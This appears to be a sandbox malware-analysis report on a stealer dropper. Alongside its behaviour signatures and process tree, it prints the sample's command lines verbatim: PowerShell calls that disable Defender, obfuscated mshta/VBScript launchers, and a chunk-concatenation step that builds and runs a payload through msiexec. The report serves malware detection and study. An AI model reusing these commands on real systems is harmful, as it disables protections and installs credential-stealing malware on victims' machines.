N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
PID 1136 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
PID 1136 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe
PID 4908 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2304 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
PID 1140 wrote to memory of 4060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
PID 1140 wrote to memory of 4060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe
PID 3640 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
PID 3640 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
PID 3640 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
PID 5032 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
PID 5032 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
PID 5032 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe
PID 1192 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
PID 1192 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
PID 1192 wrote to memory of 3812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
PID 1696 wrote to memory of 1824 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe

Processes

C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp" /SL5="$401EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4908 -ip 4908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3712 -ip 3712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 356

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7002E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

